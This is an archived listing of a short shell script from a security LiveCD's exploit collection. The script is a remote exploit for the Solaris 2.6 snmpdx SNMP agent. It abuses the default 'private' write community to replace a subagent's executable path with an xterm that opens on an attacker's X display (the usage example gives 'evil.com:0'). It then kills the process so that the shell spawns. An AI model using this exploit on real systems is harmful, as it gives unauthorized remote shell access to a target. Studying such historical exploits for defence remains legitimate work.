home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / opt / pentoo / ExploitTree / system / solaris / remote / snmpx.sh < prev    next >
Linux/UNIX/POSIX Shell Script  |  2005-02-12  |  864b  |  24 lines

  1. #!/bin/sh
  2. #
  3. # Solaris 2.6 snmpdx private and lame remote exploit by acz@hert.org
  4. #
  5.  
  6. if [ $# -ne 2 ]; then
  7.    echo "Usage: $0 <target> <evil_display>"
  8.    echo "   eg. $0 example.com evil.com:0"
  9.    exit
  10. fi
  11.  
  12. export TARGET=$1
  13. export EVIL_DISPLAY=$2
  14.  
  15.  
  16. PID=`snmpget 2>/dev/null $TARGET private .1.3.6.1.4.1.42.2.15.8.1.9.2|awk '{print $3}'`
  17. echo Process id of 2nd subagent: $PID $TARGET
  18. snmpget 2>/dev/null $TARGET private .1.3.6.1.4.1.42.2.15.8.1.7.2
  19. echo "Replacing Executable Path for 2nd subagent"
  20. eval 'snmpset 2>/dev/null $TARGET private .1.3.6.1.4.1.42.2.15.8.1.7.2 s "/usr/openwin/bin/xterm -display $EVIL_DISPLAY -ut"'
  21. echo "Sending signal -KILL to process id $PID on $TARGET"
  22. snmpset 2>/dev/null $TARGET 'all private' .1.3.6.1.4.1.42.3.12.1.1.11.$PID i 9
  23. echo "Wait for xterm now"
  24. #                    www.hack.co.za              [2000]#